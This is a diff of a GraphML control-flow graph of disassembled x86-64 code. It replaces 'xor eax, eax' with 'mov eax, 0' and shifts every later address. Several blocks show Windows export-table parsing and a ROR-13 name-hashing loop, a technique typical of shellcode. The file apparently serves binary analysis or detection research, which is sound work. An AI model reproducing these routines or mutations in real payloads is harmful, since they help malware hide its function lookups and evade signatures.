-        <edge source="block.0x1552:instruction.0x155a" target="block.0x1552:instruction.0x1566"/>
-        <edge source="block.0x1552:instruction.0x155e" target="block.0x1552:instruction.0x1566"/>
-        <edge source="block.0x1552:instruction.0x1563" target="block.0x1552:instruction.0x1566"/>
+        <edge source="block.0x1555:instruction.0x1555" target="block.0x1555:instruction.0x1559"/>
+        <edge source="block.0x1555:instruction.0x1559" target="block.0x1555:instruction.0x1566"/>
+        <edge source="block.0x1555:instruction.0x1559" target="block.0x1555:instruction.0x1569"/>
+        <edge source="block.0x1555:instruction.0x155d" target="block.0x1555:instruction.0x1569"/>
+        <edge source="block.0x1555:instruction.0x1561" target="block.0x1555:instruction.0x1569"/>
+        <edge source="block.0x1555:instruction.0x1566" target="block.0x1555:instruction.0x1569"/>
       </graph>
     </node>
-    <node id="block.0x1569">
-      <data key="address">0x1569</data>
+    <node id="block.0x156c">
+      <data key="address">0x156c</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x1569</data>
+        <data key="address">0x156c</data>
         <data key="type">instructions</data>
-        <node id="block.0x1569:instruction.0x1569">
-          <data key="address">0x1569</data>
+        <node id="block.0x156c:instruction.0x156c">
+          <data key="address">0x156c</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4883c428</data>
           <data key="instruction.source">add rsp, 0x28</data>
         </node>
-        <node id="block.0x1569:instruction.0x156d">
-          <data key="address">0x156d</data>
+        <node id="block.0x156c:instruction.0x1570">
+          <data key="address">0x1570</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4c89e8</data>
           <data key="instruction.source">mov rax, r13</data>
         </node>
-        <node id="block.0x1569:instruction.0x1570">
-          <data key="address">0x1570</data>
+        <node id="block.0x156c:instruction.0x1573">
+          <data key="address">0x1573</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">415f</data>
           <data key="instruction.source">pop r15</data>
         </node>
-        <node id="block.0x1569:instruction.0x1572">
-          <data key="address">0x1572</data>
+        <node id="block.0x156c:instruction.0x1575">
+          <data key="address">0x1575</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">415e</data>
           <data key="instruction.source">pop r14</data>
         </node>
-        <node id="block.0x1569:instruction.0x1574">
-          <data key="address">0x1574</data>
+        <node id="block.0x156c:instruction.0x1577">
+          <data key="address">0x1577</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">415d</data>
           <data key="instruction.source">pop r13</data>
         </node>
-        <node id="block.0x1569:instruction.0x1576">
-          <data key="address">0x1576</data>
+        <node id="block.0x156c:instruction.0x1579">
+          <data key="address">0x1579</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">415c</data>
           <data key="instruction.source">pop r12</data>
         </node>
-        <node id="block.0x1569:instruction.0x1578">
-          <data key="address">0x1578</data>
+        <node id="block.0x156c:instruction.0x157b">
+          <data key="address">0x157b</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">5f</data>
           <data key="instruction.source">pop rdi</data>
         </node>
-        <node id="block.0x1569:instruction.0x1579">
-          <data key="address">0x1579</data>
+        <node id="block.0x156c:instruction.0x157c">
+          <data key="address">0x157c</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">5e</data>
           <data key="instruction.source">pop rsi</data>
         </node>
-        <node id="block.0x1569:instruction.0x157a">
-          <data key="address">0x157a</data>
+        <node id="block.0x156c:instruction.0x157d">
+          <data key="address">0x157d</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">5b</data>
           <data key="instruction.source">pop rbx</data>
         </node>
-        <node id="block.0x1569:instruction.0x157b">
-          <data key="address">0x157b</data>
+        <node id="block.0x156c:instruction.0x157e">
+          <data key="address">0x157e</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4889ec</data>
           <data key="instruction.source">mov rsp, rbp</data>
         </node>
-        <node id="block.0x1569:instruction.0x157e">
-          <data key="address">0x157e</data>
+        <node id="block.0x156c:instruction.0x1581">
+          <data key="address">0x1581</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">5d</data>
           <data key="instruction.source">pop rbp</data>
         </node>
-        <node id="block.0x1569:instruction.0x157f">
-          <data key="address">0x157f</data>
+        <node id="block.0x156c:instruction.0x1582">
+          <data key="address">0x1582</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">c3</data>
           <data key="instruction.source">ret</data>
         </node>
-        <edge source="block.0x1569:instruction.0x1569" target="block.0x1569:instruction.0x1570"/>
-        <edge source="block.0x1569:instruction.0x156d" target="block.0x1569:instruction.0x1574"/>
-        <edge source="block.0x1569:instruction.0x1570" target="block.0x1569:instruction.0x1572"/>
-        <edge source="block.0x1569:instruction.0x1572" target="block.0x1569:instruction.0x1574"/>
-        <edge source="block.0x1569:instruction.0x1574" target="block.0x1569:instruction.0x1576"/>
-        <edge source="block.0x1569:instruction.0x1576" target="block.0x1569:instruction.0x1578"/>
-        <edge source="block.0x1569:instruction.0x1578" target="block.0x1569:instruction.0x1579"/>
-        <edge source="block.0x1569:instruction.0x1579" target="block.0x1569:instruction.0x157a"/>
-        <edge source="block.0x1569:instruction.0x157a" target="block.0x1569:instruction.0x157b"/>
-        <edge source="block.0x1569:instruction.0x157b" target="block.0x1569:instruction.0x157e"/>
-        <edge source="block.0x1569:instruction.0x157e" target="block.0x1569:instruction.0x157f"/>
+        <edge source="block.0x156c:instruction.0x156c" target="block.0x156c:instruction.0x1573"/>
+        <edge source="block.0x156c:instruction.0x1570" target="block.0x156c:instruction.0x1577"/>
+        <edge source="block.0x156c:instruction.0x1573" target="block.0x156c:instruction.0x1575"/>
+        <edge source="block.0x156c:instruction.0x1575" target="block.0x156c:instruction.0x1577"/>
+        <edge source="block.0x156c:instruction.0x1577" target="block.0x156c:instruction.0x1579"/>
+        <edge source="block.0x156c:instruction.0x1579" target="block.0x156c:instruction.0x157b"/>
+        <edge source="block.0x156c:instruction.0x157b" target="block.0x156c:instruction.0x157c"/>
+        <edge source="block.0x156c:instruction.0x157c" target="block.0x156c:instruction.0x157d"/>
+        <edge source="block.0x156c:instruction.0x157d" target="block.0x156c:instruction.0x157e"/>
+        <edge source="block.0x156c:instruction.0x157e" target="block.0x156c:instruction.0x1581"/>
+        <edge source="block.0x156c:instruction.0x1581" target="block.0x156c:instruction.0x1582"/>
       </graph>
     </node>
-    <node id="block.0x1580">
-      <data key="address">0x1580</data>
+    <node id="block.0x1583">
+      <data key="address">0x1583</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x1580</data>
+        <data key="address">0x1583</data>
         <data key="type">instructions</data>
-        <node id="block.0x1580:instruction.0x1580">
-          <data key="address">0x1580</data>
+        <node id="block.0x1583:instruction.0x1583">
+          <data key="address">0x1583</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">418b4204</data>
           <data key="instruction.source">mov eax, dword ptr [r10 + 4]</data>
         </node>
-        <node id="block.0x1580:instruction.0x1584">
-          <data key="address">0x1584</data>
+        <node id="block.0x1583:instruction.0x1587">
+          <data key="address">0x1587</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4d8d5a08</data>
           <data key="instruction.source">lea r11, [r10 + 8]</data>
         </node>
-        <node id="block.0x1580:instruction.0x1588">
-          <data key="address">0x1588</data>
+        <node id="block.0x1583:instruction.0x158b">
+          <data key="address">0x158b</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4989ca</data>
           <data key="instruction.source">mov r10, rcx</data>
         </node>
-        <node id="block.0x1580:instruction.0x158b">
-          <data key="address">0x158b</data>
+        <node id="block.0x1583:instruction.0x158e">
+          <data key="address">0x158e</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">41ffe3</data>
           <data key="instruction.source">jmp r11</data>
         </node>
-        <edge source="block.0x1580:instruction.0x1580" target="block.0x1580:instruction.0x1588"/>
-        <edge source="block.0x1580:instruction.0x1584" target="block.0x1580:instruction.0x1588"/>
-        <edge source="block.0x1580:instruction.0x1584" target="block.0x1580:instruction.0x158b"/>
-        <edge source="block.0x1580:instruction.0x1588" target="block.0x1580:instruction.0x158b"/>
+        <edge source="block.0x1583:instruction.0x1583" target="block.0x1583:instruction.0x158b"/>
+        <edge source="block.0x1583:instruction.0x1587" target="block.0x1583:instruction.0x158b"/>
+        <edge source="block.0x1583:instruction.0x1587" target="block.0x1583:instruction.0x158e"/>
+        <edge source="block.0x1583:instruction.0x158b" target="block.0x1583:instruction.0x158e"/>
       </graph>
     </node>
-    <node id="block.0x158e">
-      <data key="address">0x158e</data>
+    <node id="block.0x1591">
+      <data key="address">0x1591</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x158e</data>
+        <data key="address">0x1591</data>
         <data key="type">instructions</data>
-        <node id="block.0x158e:instruction.0x158e">
-          <data key="address">0x158e</data>
+        <node id="block.0x1591:instruction.0x1591">
+          <data key="address">0x1591</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">418b453c</data>
           <data key="instruction.source">mov eax, dword ptr [r13 + 0x3c]</data>
         </node>
-        <node id="block.0x158e:instruction.0x1592">
-          <data key="address">0x1592</data>
+        <node id="block.0x1591:instruction.0x1595">
+          <data key="address">0x1595</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">498d5c0500</data>
           <data key="instruction.source">lea rbx, [r13 + rax]</data>
         </node>
-        <node id="block.0x158e:instruction.0x1597">
-          <data key="address">0x1597</data>
+        <node id="block.0x1591:instruction.0x159a">
+          <data key="address">0x159a</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">8b8388000000</data>
           <data key="instruction.source">mov eax, dword ptr [rbx + 0x88]</data>
         </node>
-        <node id="block.0x158e:instruction.0x159d">
-          <data key="address">0x159d</data>
+        <node id="block.0x1591:instruction.0x15a0">
+          <data key="address">0x15a0</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">498d4c0500</data>
           <data key="instruction.source">lea rcx, [r13 + rax]</data>
         </node>
-        <node id="block.0x158e:instruction.0x15a2">
-          <data key="address">0x15a2</data>
+        <node id="block.0x1591:instruction.0x15a5">
+          <data key="address">0x15a5</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">48894dc0</data>
           <data key="instruction.source">mov qword ptr [rbp - 0x40], rcx</data>
         </node>
-        <node id="block.0x158e:instruction.0x15a6">
-          <data key="address">0x15a6</data>
+        <node id="block.0x1591:instruction.0x15a9">
+          <data key="address">0x15a9</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">8b4118</data>
           <data key="instruction.source">mov eax, dword ptr [rcx + 0x18]</data>
         </node>
-        <node id="block.0x158e:instruction.0x15a9">
-          <data key="address">0x15a9</data>
+        <node id="block.0x1591:instruction.0x15ac">
+          <data key="address">0x15ac</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">48894590</data>
           <data key="instruction.source">mov qword ptr [rbp - 0x70], rax</data>
         </node>
-        <node id="block.0x158e:instruction.0x15ad">
-          <data key="address">0x15ad</data>
+        <node id="block.0x1591:instruction.0x15b0">
+          <data key="address">0x15b0</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">8b4120</data>
           <data key="instruction.source">mov eax, dword ptr [rcx + 0x20]</data>
         </node>
-        <node id="block.0x158e:instruction.0x15b0">
-          <data key="address">0x15b0</data>
+        <node id="block.0x1591:instruction.0x15b3">
+          <data key="address">0x15b3</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">498d440500</data>
           <data key="instruction.source">lea rax, [r13 + rax]</data>
         </node>
-        <node id="block.0x158e:instruction.0x15b5">
-          <data key="address">0x15b5</data>
+        <node id="block.0x1591:instruction.0x15b8">
+          <data key="address">0x15b8</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">488945b8</data>
           <data key="instruction.source">mov qword ptr [rbp - 0x48], rax</data>
         </node>
-        <node id="block.0x158e:instruction.0x15b9">
-          <data key="address">0x15b9</data>
+        <node id="block.0x1591:instruction.0x15bc">
+          <data key="address">0x15bc</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">8b4124</data>
           <data key="instruction.source">mov eax, dword ptr [rcx + 0x24]</data>
         </node>
-        <node id="block.0x158e:instruction.0x15bc">
-          <data key="address">0x15bc</data>
+        <node id="block.0x1591:instruction.0x15bf">
+          <data key="address">0x15bf</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">498d440500</data>
           <data key="instruction.source">lea rax, [r13 + rax]</data>
         </node>
-        <node id="block.0x158e:instruction.0x15c1">
-          <data key="address">0x15c1</data>
+        <node id="block.0x1591:instruction.0x15c4">
+          <data key="address">0x15c4</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">488945b0</data>
           <data key="instruction.source">mov qword ptr [rbp - 0x50], rax</data>
         </node>
-        <node id="block.0x158e:instruction.0x15c5">
-          <data key="address">0x15c5</data>
+        <node id="block.0x1591:instruction.0x15c8">
+          <data key="address">0x15c8</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">c3</data>
           <data key="instruction.source">ret</data>
         </node>
-        <edge source="block.0x158e:instruction.0x158e" target="block.0x158e:instruction.0x1592"/>
-        <edge source="block.0x158e:instruction.0x158e" target="block.0x158e:instruction.0x1597"/>
-        <edge source="block.0x158e:instruction.0x158e" target="block.0x158e:instruction.0x15a2"/>
-        <edge source="block.0x158e:instruction.0x1592" target="block.0x158e:instruction.0x1597"/>
-        <edge source="block.0x158e:instruction.0x1597" target="block.0x158e:instruction.0x159d"/>
-        <edge source="block.0x158e:instruction.0x1597" target="block.0x158e:instruction.0x15a2"/>
-        <edge source="block.0x158e:instruction.0x1597" target="block.0x158e:instruction.0x15a6"/>
-        <edge source="block.0x158e:instruction.0x159d" target="block.0x158e:instruction.0x15a2"/>
-        <edge source="block.0x158e:instruction.0x159d" target="block.0x158e:instruction.0x15a6"/>
-        <edge source="block.0x158e:instruction.0x159d" target="block.0x158e:instruction.0x15ad"/>
-        <edge source="block.0x158e:instruction.0x159d" target="block.0x158e:instruction.0x15b9"/>
-        <edge source="block.0x158e:instruction.0x15a2" target="block.0x158e:instruction.0x15a6"/>
-        <edge source="block.0x158e:instruction.0x15a6" target="block.0x158e:instruction.0x15a9"/>
-        <edge source="block.0x158e:instruction.0x15a6" target="block.0x158e:instruction.0x15ad"/>
-        <edge source="block.0x158e:instruction.0x15a9" target="block.0x158e:instruction.0x15ad"/>
-        <edge source="block.0x158e:instruction.0x15ad" target="block.0x158e:instruction.0x15b0"/>
-        <edge source="block.0x158e:instruction.0x15ad" target="block.0x158e:instruction.0x15b5"/>
-        <edge source="block.0x158e:instruction.0x15b0" target="block.0x158e:instruction.0x15b5"/>
-        <edge source="block.0x158e:instruction.0x15b0" target="block.0x158e:instruction.0x15b9"/>
-        <edge source="block.0x158e:instruction.0x15b5" target="block.0x158e:instruction.0x15b9"/>
-        <edge source="block.0x158e:instruction.0x15b9" target="block.0x158e:instruction.0x15bc"/>
-        <edge source="block.0x158e:instruction.0x15b9" target="block.0x158e:instruction.0x15c1"/>
-        <edge source="block.0x158e:instruction.0x15bc" target="block.0x158e:instruction.0x15c1"/>
-        <edge source="block.0x158e:instruction.0x15c1" target="block.0x158e:instruction.0x15c5"/>
+        <edge source="block.0x1591:instruction.0x1591" target="block.0x1591:instruction.0x1595"/>
+        <edge source="block.0x1591:instruction.0x1591" target="block.0x1591:instruction.0x159a"/>
+        <edge source="block.0x1591:instruction.0x1591" target="block.0x1591:instruction.0x15a5"/>
+        <edge source="block.0x1591:instruction.0x1595" target="block.0x1591:instruction.0x159a"/>
+        <edge source="block.0x1591:instruction.0x159a" target="block.0x1591:instruction.0x15a0"/>
+        <edge source="block.0x1591:instruction.0x159a" target="block.0x1591:instruction.0x15a5"/>
+        <edge source="block.0x1591:instruction.0x159a" target="block.0x1591:instruction.0x15a9"/>
+        <edge source="block.0x1591:instruction.0x15a0" target="block.0x1591:instruction.0x15a5"/>
+        <edge source="block.0x1591:instruction.0x15a0" target="block.0x1591:instruction.0x15a9"/>
+        <edge source="block.0x1591:instruction.0x15a0" target="block.0x1591:instruction.0x15b0"/>
+        <edge source="block.0x1591:instruction.0x15a0" target="block.0x1591:instruction.0x15bc"/>
+        <edge source="block.0x1591:instruction.0x15a5" target="block.0x1591:instruction.0x15a9"/>
+        <edge source="block.0x1591:instruction.0x15a9" target="block.0x1591:instruction.0x15ac"/>
+        <edge source="block.0x1591:instruction.0x15a9" target="block.0x1591:instruction.0x15b0"/>
+        <edge source="block.0x1591:instruction.0x15ac" target="block.0x1591:instruction.0x15b0"/>
+        <edge source="block.0x1591:instruction.0x15b0" target="block.0x1591:instruction.0x15b3"/>
+        <edge source="block.0x1591:instruction.0x15b0" target="block.0x1591:instruction.0x15b8"/>
+        <edge source="block.0x1591:instruction.0x15b3" target="block.0x1591:instruction.0x15b8"/>
+        <edge source="block.0x1591:instruction.0x15b3" target="block.0x1591:instruction.0x15bc"/>
+        <edge source="block.0x1591:instruction.0x15b8" target="block.0x1591:instruction.0x15bc"/>
+        <edge source="block.0x1591:instruction.0x15bc" target="block.0x1591:instruction.0x15bf"/>
+        <edge source="block.0x1591:instruction.0x15bc" target="block.0x1591:instruction.0x15c4"/>
+        <edge source="block.0x1591:instruction.0x15bf" target="block.0x1591:instruction.0x15c4"/>
+        <edge source="block.0x1591:instruction.0x15c4" target="block.0x1591:instruction.0x15c8"/>
       </graph>
     </node>
-    <node id="block.0x15c6">
-      <data key="address">0x15c6</data>
+    <node id="block.0x15c9">
+      <data key="address">0x15c9</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x15c6</data>
+        <data key="address">0x15c9</data>
         <data key="type">instructions</data>
-        <node id="block.0x15c6:instruction.0x15c6">
-          <data key="address">0x15c6</data>
+        <node id="block.0x15c9:instruction.0x15c9">
+          <data key="address">0x15c9</data>
           <data key="type">instruction</data>
-          <data key="instruction.hex">31c0</data>
-          <data key="instruction.source">xor eax, eax</data>
+          <data key="instruction.hex">b800000000</data>
+          <data key="instruction.source">mov eax, 0</data>
         </node>
       </graph>
     </node>
-    <node id="block.0x15c8">
-      <data key="address">0x15c8</data>
+    <node id="block.0x15ce">
+      <data key="address">0x15ce</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x15c8</data>
+        <data key="address">0x15ce</data>
         <data key="type">instructions</data>
-        <node id="block.0x15c8:instruction.0x15c8">
-          <data key="address">0x15c8</data>
+        <node id="block.0x15ce:instruction.0x15ce">
+          <data key="address">0x15ce</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">0fb619</data>
           <data key="instruction.source">movzx ebx, byte ptr [rcx]</data>
         </node>
-        <node id="block.0x15c8:instruction.0x15cb">
-          <data key="address">0x15cb</data>
+        <node id="block.0x15ce:instruction.0x15d1">
+          <data key="address">0x15d1</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">85db</data>
           <data key="instruction.source">test ebx, ebx</data>
         </node>
-        <node id="block.0x15c8:instruction.0x15cd">
-          <data key="address">0x15cd</data>
+        <node id="block.0x15ce:instruction.0x15d3">
+          <data key="address">0x15d3</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">740a</data>
-          <data key="instruction.source">je 0x15d9</data>
+          <data key="instruction.source">je 0x15df</data>
         </node>
-        <edge source="block.0x15c8:instruction.0x15c8" target="block.0x15c8:instruction.0x15cb"/>
-        <edge source="block.0x15c8:instruction.0x15cb" target="block.0x15c8:instruction.0x15cd"/>
+        <edge source="block.0x15ce:instruction.0x15ce" target="block.0x15ce:instruction.0x15d1"/>
+        <edge source="block.0x15ce:instruction.0x15d1" target="block.0x15ce:instruction.0x15d3"/>
       </graph>
     </node>
-    <node id="block.0x15cf">
-      <data key="address">0x15cf</data>
+    <node id="block.0x15d5">
+      <data key="address">0x15d5</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x15cf</data>
+        <data key="address">0x15d5</data>
         <data key="type">instructions</data>
-        <node id="block.0x15cf:instruction.0x15cf">
-          <data key="address">0x15cf</data>
+        <node id="block.0x15d5:instruction.0x15d5">
+          <data key="address">0x15d5</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">c1c80d</data>
           <data key="instruction.source">ror eax, 0xd</data>
         </node>
-        <node id="block.0x15cf:instruction.0x15d2">
-          <data key="address">0x15d2</data>
+        <node id="block.0x15d5:instruction.0x15d8">
+          <data key="address">0x15d8</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">01d8</data>
           <data key="instruction.source">add eax, ebx</data>
         </node>
-        <node id="block.0x15cf:instruction.0x15d4">
-          <data key="address">0x15d4</data>
+        <node id="block.0x15d5:instruction.0x15da">
+          <data key="address">0x15da</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">48ffc1</data>
           <data key="instruction.source">inc rcx</data>
         </node>
-        <node id="block.0x15cf:instruction.0x15d7">
-          <data key="address">0x15d7</data>
+        <node id="block.0x15d5:instruction.0x15dd">
+          <data key="address">0x15dd</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">ebef</data>
-          <data key="instruction.source">jmp 0x15c8</data>
+          <data key="instruction.source">jmp 0x15ce</data>
         </node>
-        <edge source="block.0x15cf:instruction.0x15cf" target="block.0x15cf:instruction.0x15d2"/>
-        <edge source="block.0x15cf:instruction.0x15cf" target="block.0x15cf:instruction.0x15d4"/>
-        <edge source="block.0x15cf:instruction.0x15d2" target="block.0x15cf:instruction.0x15d4"/>
-        <edge source="block.0x15cf:instruction.0x15d4" target="block.0x15cf:instruction.0x15d7"/>
+        <edge source="block.0x15d5:instruction.0x15d5" target="block.0x15d5:instruction.0x15d8"/>
+        <edge source="block.0x15d5:instruction.0x15d5" target="block.0x15d5:instruction.0x15da"/>
+        <edge source="block.0x15d5:instruction.0x15d8" target="block.0x15d5:instruction.0x15da"/>
+        <edge source="block.0x15d5:instruction.0x15da" target="block.0x15d5:instruction.0x15dd"/>
       </graph>
     </node>
-    <node id="block.0x15d9">
-      <data key="address">0x15d9</data>
+    <node id="block.0x15df">
+      <data key="address">0x15df</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x15d9</data>
+        <data key="address">0x15df</data>
         <data key="type">instructions</data>
-        <node id="block.0x15d9:instruction.0x15d9">
-          <data key="address">0x15d9</data>
+        <node id="block.0x15df:instruction.0x15df">
+          <data key="address">0x15df</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">c3</data>
           <data key="instruction.source">ret</data>
         </node>
       </graph>
     </node>
-    <node id="block.0x15da">
-      <data key="address">0x15da</data>
+    <node id="block.0x15e0">
+      <data key="address">0x15e0</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x15da</data>
+        <data key="address">0x15e0</data>
         <data key="type">instructions</data>
-        <node id="block.0x15da:instruction.0x15da">
-          <data key="address">0x15da</data>
+        <node id="block.0x15e0:instruction.0x15e0">
+          <data key="address">0x15e0</data>
           <data key="type">instruction</data>
-          <data key="instruction.hex">e8e7feffff</data>
-          <data key="instruction.source">call 0x14c6</data>
+          <data key="instruction.hex">e8e4feffff</data>
+          <data key="instruction.source">call 0x14c9</data>
         </node>
       </graph>
     </node>
-    <node id="block.0x15df">
-      <data key="address">0x15df</data>
+    <node id="block.0x15e5">
+      <data key="address">0x15e5</data>
       <data key="type">data</data>
       <data key="data.hex">0110022004400440</data>
     </node>
@@ -3661,98 +3661,98 @@
     <edge source="block.0x1077" target="block.0x108c"/>
     <edge source="block.0x108c" target="block.0x1095"/>
     <edge source="block.0x1095" target="block.0x10a7"/>
-    <edge source="block.0x10a7" target="block.0x10ae"/>
-    <edge source="block.0x10ae" target="block.0x10ba"/>
-    <edge source="block.0x10ba" target="block.0x10bd"/>
-    <edge source="block.0x10bd" target="block.0x10c8"/>
-    <edge source="block.0x10c8" target="block.0x10d1"/>
-    <edge source="block.0x10d1" target="block.0x10de"/>
-    <edge source="block.0x10de" target="block.0x10e3"/>
-    <edge source="block.0x10e3" target="block.0x10f4"/>
-    <edge source="block.0x10f4" target="block.0x10ff"/>
-    <edge source="block.0x10ff" target="block.0x110c"/>
-    <edge source="block.0x110c" target="block.0x1122"/>
-    <edge source="block.0x1122" target="block.0x1130"/>
-    <edge source="block.0x1130" target="block.0x1137"/>
-    <edge source="block.0x1137" target="block.0x1139"/>
-    <edge source="block.0x1139" target="block.0x1165"/>
-    <edge source="block.0x1165" target="block.0x116b"/>
-    <edge source="block.0x116b" target="block.0x116f"/>
-    <edge source="block.0x116f" target="block.0x1189"/>
-    <edge source="block.0x1189" target="block.0x1198"/>
-    <edge source="block.0x1198" target="block.0x11a9"/>
-    <edge source="block.0x11a9" target="block.0x11b4"/>
-    <edge source="block.0x11b4" target="block.0x11c1"/>
-    <edge source="block.0x11c1" target="block.0x11d7"/>
-    <edge source="block.0x11d7" target="block.0x11e5"/>
-    <edge source="block.0x11e5" target="block.0x11ec"/>
-    <edge source="block.0x11ec" target="block.0x11f3"/>
-    <edge source="block.0x11f3" target="block.0x11f5"/>
-    <edge source="block.0x11f5" target="block.0x1221"/>
-    <edge source="block.0x1221" target="block.0x1227"/>
-    <edge source="block.0x1227" target="block.0x122e"/>
-    <edge source="block.0x122e" target="block.0x1234"/>
-    <edge source="block.0x1234" target="block.0x123b"/>
-    <edge source="block.0x123b" target="block.0x1251"/>
-    <edge source="block.0x1251" target="block.0x1260"/>
-    <edge source="block.0x1260" target="block.0x1269"/>
-    <edge source="block.0x1269" target="block.0x1272"/>
-    <edge source="block.0x1272" target="block.0x127b"/>
-    <edge source="block.0x127b" target="block.0x1287"/>
-    <edge source="block.0x1287" target="block.0x1290"/>
-    <edge source="block.0x1290" target="block.0x129c"/>
-    <edge source="block.0x129c" target="block.0x12ee"/>
-    <edge source="block.0x12ee" target="block.0x1308"/>
-    <edge source="block.0x1308" target="block.0x130a"/>
-    <edge source="block.0x130a" target="block.0x131b"/>
-    <edge source="block.0x131b" target="block.0x1320"/>
-    <edge source="block.0x1320" target="block.0x133a"/>
-    <edge source="block.0x133a" target="block.0x133c"/>
-    <edge source="block.0x133c" target="block.0x1345"/>
-    <edge source="block.0x1345" target="block.0x1355"/>
-    <edge source="block.0x1355" target="block.0x135c"/>
-    <edge source="block.0x135c" target="block.0x1368"/>
-    <edge source="block.0x1368" target="block.0x1376"/>
-    <edge source="block.0x1376" target="block.0x1384"/>
-    <edge source="block.0x1384" target="block.0x1388"/>
-    <edge source="block.0x1388" target="block.0x139a"/>
-    <edge source="block.0x139a" target="block.0x13a2"/>
-    <edge source="block.0x13a2" target="block.0x13b1"/>
-    <edge source="block.0x13b1" target="block.0x13c9"/>
-    <edge source="block.0x13c9" target="block.0x13d2"/>
-    <edge source="block.0x13d2" target="block.0x13e0"/>
-    <edge source="block.0x13e0" target="block.0x13e7"/>
-    <edge source="block.0x13e7" target="block.0x13f1"/>
-    <edge source="block.0x13f1" target="block.0x13fa"/>
-    <edge source="block.0x13fa" target="block.0x1416"/>
-    <edge source="block.0x1416" target="block.0x1422"/>
-    <edge source="block.0x1422" target="block.0x1429"/>
-    <edge source="block.0x1429" target="block.0x1431"/>
-    <edge source="block.0x1431" target="block.0x1447"/>
-    <edge source="block.0x1447" target="block.0x144c"/>
-    <edge source="block.0x144c" target="block.0x1460"/>
-    <edge source="block.0x1460" target="block.0x1465"/>
-    <edge source="block.0x1465" target="block.0x1467"/>
-    <edge source="block.0x1467" target="block.0x1472"/>
-    <edge source="block.0x1472" target="block.0x147c"/>
-    <edge source="block.0x147c" target="block.0x1485"/>
-    <edge source="block.0x1485" target="block.0x148e"/>
-    <edge source="block.0x148e" target="block.0x14aa"/>
-    <edge source="block.0x14aa" target="block.0x14af"/>
-    <edge source="block.0x14af" target="block.0x14b7"/>
-    <edge source="block.0x14b7" target="block.0x14c6"/>
-    <edge source="block.0x14c6" target="block.0x151a"/>
-    <edge source="block.0x151a" target="block.0x151e"/>
-    <edge source="block.0x151e" target="block.0x1527"/>
-    <edge source="block.0x1527" target="block.0x1552"/>
-    <edge source="block.0x1552" target="block.0x1569"/>
-    <edge source="block.0x1569" target="block.0x1580"/>
-    <edge source="block.0x1580" target="block.0x158e"/>
-    <edge source="block.0x158e" target="block.0x15c6"/>
-    <edge source="block.0x15c6" target="block.0x15c8"/>
-    <edge source="block.0x15c8" target="block.0x15cf"/>
-    <edge source="block.0x15cf" target="block.0x15d9"/>
-    <edge source="block.0x15d9" target="block.0x15da"/>
-    <edge source="block.0x15da" target="block.0x15df"/>
+    <edge source="block.0x10a7" target="block.0x10b1"/>
+    <edge source="block.0x10b1" target="block.0x10bd"/>
+    <edge source="block.0x10bd" target="block.0x10c0"/>
+    <edge source="block.0x10c0" target="block.0x10cb"/>
+    <edge source="block.0x10cb" target="block.0x10d4"/>
+    <edge source="block.0x10d4" target="block.0x10e1"/>
+    <edge source="block.0x10e1" target="block.0x10e6"/>
+    <edge source="block.0x10e6" target="block.0x10f7"/>
+    <edge source="block.0x10f7" target="block.0x1102"/>
+    <edge source="block.0x1102" target="block.0x110f"/>
+    <edge source="block.0x110f" target="block.0x1125"/>
+    <edge source="block.0x1125" target="block.0x1133"/>
+    <edge source="block.0x1133" target="block.0x113a"/>
+    <edge source="block.0x113a" target="block.0x113c"/>
+    <edge source="block.0x113c" target="block.0x1168"/>
+    <edge source="block.0x1168" target="block.0x116e"/>
+    <edge source="block.0x116e" target="block.0x1172"/>
+    <edge source="block.0x1172" target="block.0x118c"/>
+    <edge source="block.0x118c" target="block.0x119b"/>
+    <edge source="block.0x119b" target="block.0x11ac"/>
+    <edge source="block.0x11ac" target="block.0x11b7"/>
+    <edge source="block.0x11b7" target="block.0x11c4"/>
+    <edge source="block.0x11c4" target="block.0x11da"/>
+    <edge source="block.0x11da" target="block.0x11e8"/>
+    <edge source="block.0x11e8" target="block.0x11ef"/>
+    <edge source="block.0x11ef" target="block.0x11f6"/>
